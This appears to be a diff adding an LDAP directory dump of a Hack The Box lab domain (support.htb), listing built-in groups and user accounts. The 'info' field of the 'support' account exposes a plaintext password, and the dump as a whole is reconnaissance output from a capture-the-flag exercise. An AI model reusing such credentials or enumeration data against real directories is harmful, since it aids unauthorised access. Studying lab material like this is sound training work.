+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILAAIAAA==
+adminCount: 1
+sAMAccountName: Domain Admins
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# Domain Users, Users, support.htb
+dn: CN=Domain Users,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Domain Users
+description: All domain users
+distinguishedName: CN=Domain Users,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12348
+memberOf: CN=Users,CN=Builtin,DC=support,DC=htb
+uSNChanged: 12350
+name: Domain Users
+objectGUID:: 0o8/7t9hYEOGiqI3/a9qPw==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILAQIAAA==
+sAMAccountName: Domain Users
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Domain Guests, Users, support.htb
+dn: CN=Domain Guests,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Domain Guests
+description: All domain guests
+distinguishedName: CN=Domain Guests,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12351
+memberOf: CN=Guests,CN=Builtin,DC=support,DC=htb
+uSNChanged: 12353
+name: Domain Guests
+objectGUID:: FohOjdYt806Z8OJmhd8T8g==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILAgIAAA==
+sAMAccountName: Domain Guests
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Group Policy Creator Owners, Users, support.htb
+dn: CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Group Policy Creator Owners
+description: Members in this group can modify group policy for the domain
+member: CN=Administrator,CN=Users,DC=support,DC=htb
+distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12354
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+uSNChanged: 12391
+name: Group Policy Creator Owners
+objectGUID:: V/lnboosdEKRY0iXk4eXhg==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILCAIAAA==
+sAMAccountName: Group Policy Creator Owners
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# RAS and IAS Servers, Users, support.htb
+dn: CN=RAS and IAS Servers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: RAS and IAS Servers
+description: Servers in this group can access remote access properties of user
+ s
+distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12357
+uSNChanged: 12359
+name: RAS and IAS Servers
+objectGUID:: aziHrRu9g0eTB+Blm+vlzg==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILKQIAAA==
+sAMAccountName: RAS and IAS Servers
+sAMAccountType: 536870912
+groupType: -2147483644
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Allowed RODC Password Replication Group, Users, support.htb
+dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Allowed RODC Password Replication Group
+description: Members in this group can have their passwords replicated to all
+ read-only domain controllers in the domain
+distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=supp
+ ort,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12402
+uSNChanged: 12404
+name: Allowed RODC Password Replication Group
+objectGUID:: c9ipRQgk1U+7kOD9r95qrw==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILOwIAAA==
+sAMAccountName: Allowed RODC Password Replication Group
+sAMAccountType: 536870912
+groupType: -2147483644
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Denied RODC Password Replication Group, Users, support.htb
+dn: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Denied RODC Password Replication Group
+description: Members in this group cannot have their passwords replicated to a
+ ny read-only domain controllers in the domain
+member: CN=Read-only Domain Controllers,CN=Users,DC=support,DC=htb
+member: CN=Group Policy Creator Owners,CN=Users,DC=support,DC=htb
+member: CN=Domain Admins,CN=Users,DC=support,DC=htb
+member: CN=Cert Publishers,CN=Users,DC=support,DC=htb
+member: CN=Enterprise Admins,CN=Users,DC=support,DC=htb
+member: CN=Schema Admins,CN=Users,DC=support,DC=htb
+member: CN=Domain Controllers,CN=Users,DC=support,DC=htb
+member: CN=krbtgt,CN=Users,DC=support,DC=htb
+distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=suppo
+ rt,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12405
+uSNChanged: 12433
+name: Denied RODC Password Replication Group
+objectGUID:: JX6Bq3TqBEO536AlmQTXGQ==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILPAIAAA==
+sAMAccountName: Denied RODC Password Replication Group
+sAMAccountType: 536870912
+groupType: -2147483644
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Read-only Domain Controllers, Users, support.htb
+dn: CN=Read-only Domain Controllers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Read-only Domain Controllers
+description: Members of this group are Read-Only Domain Controllers in the dom
+ ain
+distinguishedName: CN=Read-only Domain Controllers,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12419
+memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb
+uSNChanged: 13089
+name: Read-only Domain Controllers
+objectGUID:: oyG5YD2XqE6hwnqADL3JYA==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILCQIAAA==
+adminCount: 1
+sAMAccountName: Read-only Domain Controllers
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# Enterprise Read-only Domain Controllers, Users, support.htb
+dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Enterprise Read-only Domain Controllers
+description: Members of this group are Read-Only Domain Controllers in the ent
+ erprise
+distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=supp
+ ort,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12429
+uSNChanged: 12431
+name: Enterprise Read-only Domain Controllers
+objectGUID:: Uv8SRz7wvUCtT3ekcPs1Nw==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL8gEAAA==
+sAMAccountName: Enterprise Read-only Domain Controllers
+sAMAccountType: 268435456
+groupType: -2147483640
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Cloneable Domain Controllers, Users, support.htb
+dn: CN=Cloneable Domain Controllers,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Cloneable Domain Controllers
+description: Members of this group that are domain controllers may be cloned.
+distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12440
+uSNChanged: 12442
+name: Cloneable Domain Controllers
+objectGUID:: 6o/buUpCVkWE1hsYhJ0C7A==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILCgIAAA==
+sAMAccountName: Cloneable Domain Controllers
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Protected Users, Users, support.htb
+dn: CN=Protected Users,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Protected Users
+description: Members of this group are afforded additional protections against
+ authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=
+ 298939 for more information.
+distinguishedName: CN=Protected Users,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528110343.0Z
+uSNCreated: 12445
+uSNChanged: 12447
+name: Protected Users
+objectGUID:: WWO6zBhGcU2BvsuFsuijDQ==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILDQIAAA==
+sAMAccountName: Protected Users
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000001.0Z
+
+# Key Admins, Users, support.htb
+dn: CN=Key Admins,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Key Admins
+description: Members of this group can perform administrative actions on key o
+ bjects within the domain.
+distinguishedName: CN=Key Admins,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12450
+uSNChanged: 13072
+name: Key Admins
+objectGUID:: lu9JrnlC0EqsJO7Ca/1Yyg==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILDgIAAA==
+adminCount: 1
+sAMAccountName: Key Admins
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# Enterprise Key Admins, Users, support.htb
+dn: CN=Enterprise Key Admins,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Enterprise Key Admins
+description: Members of this group can perform administrative actions on key o
+ bjects within the forest.
+distinguishedName: CN=Enterprise Key Admins,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110343.0Z
+whenChanged: 20220528111947.0Z
+uSNCreated: 12453
+uSNChanged: 13075
+name: Enterprise Key Admins
+objectGUID:: +XXDlrk+kkaqJztpO6OUlQ==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILDwIAAA==
+adminCount: 1
+sAMAccountName: Enterprise Key Admins
+sAMAccountType: 268435456
+groupType: -2147483640
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+isCriticalSystemObject: TRUE
+dSCorePropagationData: 20220528111947.0Z
+dSCorePropagationData: 20220528110344.0Z
+dSCorePropagationData: 16010101000416.0Z
+
+# DnsAdmins, Users, support.htb
+dn: CN=DnsAdmins,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: DnsAdmins
+description: DNS Administrators Group
+distinguishedName: CN=DnsAdmins,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110517.0Z
+whenChanged: 20220528110517.0Z
+uSNCreated: 12487
+uSNChanged: 12489
+name: DnsAdmins
+objectGUID:: 2q5qdYNl8EauIghx5W/HkA==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILTQQAAA==
+sAMAccountName: DnsAdmins
+sAMAccountType: 536870912
+groupType: -2147483644
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 16010101000000.0Z
+
+# DnsUpdateProxy, Users, support.htb
+dn: CN=DnsUpdateProxy,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: DnsUpdateProxy
+description: DNS clients who are permitted to perform dynamic updates on behal
+ f of some other clients (such as DHCP servers).
+distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528110517.0Z
+whenChanged: 20220528110517.0Z
+uSNCreated: 12492
+uSNChanged: 12492
+name: DnsUpdateProxy
+objectGUID:: Nc+gxph1Vkag0TSb27cHLw==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILTgQAAA==
+sAMAccountName: DnsUpdateProxy
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 16010101000000.0Z
+
+# Shared Support Accounts, Users, support.htb
+dn: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: group
+cn: Shared Support Accounts
+member: CN=support,CN=Users,DC=support,DC=htb
+distinguishedName: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111132.0Z
+whenChanged: 20220528111204.0Z
+uSNCreated: 12599
+uSNChanged: 12635
+name: Shared Support Accounts
+objectGUID:: dVLmpti4CUarxgBZ0GZQFw==
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILTwQAAA==
+sAMAccountName: Shared Support Accounts
+sAMAccountType: 268435456
+groupType: -2147483646
+objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 16010101000000.0Z
+
+# ldap, Users, support.htb
+dn: CN=ldap,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: ldap
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+distinguishedName: CN=ldap,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111146.0Z
+whenChanged: 20220819130201.0Z
+uSNCreated: 12603
+uSNChanged: 122843
+company: support
+streetAddress: Skipper Bowles Dr
+name: ldap
+objectGUID:: /6UvjDrNT0GyZFt9CzrgfQ==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 133053977118042298
+lastLogoff: 0
+lastLogon: 133053977202167339
+pwdLastSet: 132982099064620523
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUAQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: ldap
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111146.0Z
+dSCorePropagationData: 16010101000000.0Z
+lastLogonTimestamp: 133053877211215389
+
+# support, Users, support.htb
+dn: CN=support,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: support
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+distinguishedName: CN=support,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111200.0Z
+whenChanged: 20220819134757.0Z
+uSNCreated: 12617
+info: Ironside47pleasure40Watchful
+memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
+memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
+uSNChanged: 122847
+company: support
+streetAddress: Skipper Bowles Dr
+name: support
+objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 133053968645324382
+lastLogoff: 0
+lastLogon: 133053983836932396
+pwdLastSet: 132982099209777070
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: support
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111201.0Z
+dSCorePropagationData: 16010101000000.0Z
+lastLogonTimestamp: 133053904772994654
+
+# smith.rosario, Users, support.htb
+dn: CN=smith.rosario,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: smith.rosario
+sn: smith
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: rosario
+distinguishedName: CN=smith.rosario,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111219.0Z
+whenChanged: 20220528111219.0Z
+uSNCreated: 12638
+uSNChanged: 12653
+company: support
+streetAddress: Skipper Bowles Dr
+name: smith.rosario
+objectGUID:: xrmo4GlsuUajfnkG3CBMrg==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982099393057986
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUgQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: smith.rosario
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111219.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: smith.rosario@support.htb
+
+# hernandez.stanley, Users, support.htb
+dn: CN=hernandez.stanley,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: hernandez.stanley
+sn: hernandez
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: stanley
+distinguishedName: CN=hernandez.stanley,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111234.0Z
+whenChanged: 20220528111235.0Z
+uSNCreated: 12655
+uSNChanged: 12670
+company: support
+streetAddress: Skipper Bowles Dr
+name: hernandez.stanley
+objectGUID:: L81uL06kXEOWM2Qn8ww2qA==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982099548708177
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUwQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: hernandez.stanley
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111235.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: hernandez.stanley@support.htb
+
+# wilson.shelby, Users, support.htb
+dn: CN=wilson.shelby,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: wilson.shelby
+sn: wilson
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: shelby
+distinguishedName: CN=wilson.shelby,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111250.0Z
+whenChanged: 20220528111251.0Z
+uSNCreated: 12672
+uSNChanged: 12687
+company: support
+streetAddress: Skipper Bowles Dr
+name: wilson.shelby
+objectGUID:: XbKIVlHxiUa1D5CZfJJG9A==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982099703526781
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILVAQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: wilson.shelby
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111250.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: wilson.shelby@support.htb
+
+# anderson.damian, Users, support.htb
+dn: CN=anderson.damian,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: anderson.damian
+sn: anderson
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: damian
+distinguishedName: CN=anderson.damian,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111305.0Z
+whenChanged: 20220528111306.0Z
+uSNCreated: 12689
+uSNChanged: 12704
+company: support
+streetAddress: Skipper Bowles Dr
+name: anderson.damian
+objectGUID:: 3yoA+1yHqUaNkyZV3AwohQ==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982099859932951
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILVQQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: anderson.damian
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111306.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: anderson.damian@support.htb
+
+# thomas.raphael, Users, support.htb
+dn: CN=thomas.raphael,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: thomas.raphael
+sn: thomas
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: raphael
+distinguishedName: CN=thomas.raphael,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111321.0Z
+whenChanged: 20220528111322.0Z
+uSNCreated: 12706
+uSNChanged: 12721
+company: support
+streetAddress: Skipper Bowles Dr
+name: thomas.raphael
+objectGUID:: sard51WjwU2UuCtT0BGwug==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100017745577
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILVgQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: thomas.raphael
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111322.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: thomas.raphael@support.htb
+
+# levine.leopoldo, Users, support.htb
+dn: CN=levine.leopoldo,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: levine.leopoldo
+sn: levine
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: leopoldo
+distinguishedName: CN=levine.leopoldo,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111337.0Z
+whenChanged: 20220528111338.0Z
+uSNCreated: 12891
+uSNChanged: 12906
+company: support
+streetAddress: Skipper Bowles Dr
+name: levine.leopoldo
+objectGUID:: zaT1TYtnNUKvrkK/fHjf0Q==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100175089241
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILVwQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: levine.leopoldo
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111337.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: levine.leopoldo@support.htb
+
+# raven.clifton, Users, support.htb
+dn: CN=raven.clifton,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: raven.clifton
+sn: raven
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: clifton
+distinguishedName: CN=raven.clifton,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111352.0Z
+whenChanged: 20220528111353.0Z
+uSNCreated: 12908
+uSNChanged: 12923
+company: support
+streetAddress: Skipper Bowles Dr
+name: raven.clifton
+objectGUID:: r4Ljo7fDek6FZN1CBI375w==
+userAccountControl: 66048
+badPwdCount: 1450
+codePage: 0
+countryCode: 0
+badPasswordTime: 133053948646435228
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100331339215
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILWAQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: raven.clifton
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111353.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: raven.clifton@support.htb
+
+# bardot.mary, Users, support.htb
+dn: CN=bardot.mary,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: bardot.mary
+sn: bardot
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: mary
+distinguishedName: CN=bardot.mary,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111408.0Z
+whenChanged: 20220528111409.0Z
+uSNCreated: 12925
+uSNChanged: 12940
+company: support
+streetAddress: Skipper Bowles Dr
+name: bardot.mary
+objectGUID:: bp+GlFYgwUiy169DiKxEfg==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100486339253
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILWQQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: bardot.mary
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111408.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: bardot.mary@support.htb
+
+# cromwell.gerard, Users, support.htb
+dn: CN=cromwell.gerard,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: cromwell.gerard
+sn: cromwell
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: gerard
+distinguishedName: CN=cromwell.gerard,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111424.0Z
+whenChanged: 20220528111424.0Z
+uSNCreated: 12942
+uSNChanged: 12957
+company: support
+streetAddress: Skipper Bowles Dr
+name: cromwell.gerard
+objectGUID:: t5fIUmTNZEmsOEoXkg1PfA==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100642589204
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILWgQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: cromwell.gerard
+sAMAccountType: 805306368
+objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
+dSCorePropagationData: 20220528111424.0Z
+dSCorePropagationData: 16010101000000.0Z
+mail: cromwell.gerard@support.htb
+
+# monroe.david, Users, support.htb
+dn: CN=monroe.david,CN=Users,DC=support,DC=htb
+objectClass: top
+objectClass: person
+objectClass: organizationalPerson
+objectClass: user
+cn: monroe.david
+sn: monroe
+c: US
+l: Chapel Hill
+st: NC
+postalCode: 27514
+givenName: david
+distinguishedName: CN=monroe.david,CN=Users,DC=support,DC=htb
+instanceType: 4
+whenCreated: 20220528111439.0Z
+whenChanged: 20220528111440.0Z
+uSNCreated: 12959
+uSNChanged: 12974
+company: support
+streetAddress: Skipper Bowles Dr
+name: monroe.david
+objectGUID:: BAScccXiIEKhwgp//rBwwA==
+userAccountControl: 66048
+badPwdCount: 0
+codePage: 0
+countryCode: 0
+badPasswordTime: 0
+lastLogoff: 0
+lastLogon: 0
+pwdLastSet: 132982100797120581
+primaryGroupID: 513
+objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILWwQAAA==
+accountExpires: 9223372036854775807
+logonCount: 0
+sAMAccountName: monroe.david
+sAMAccountType: 805306368
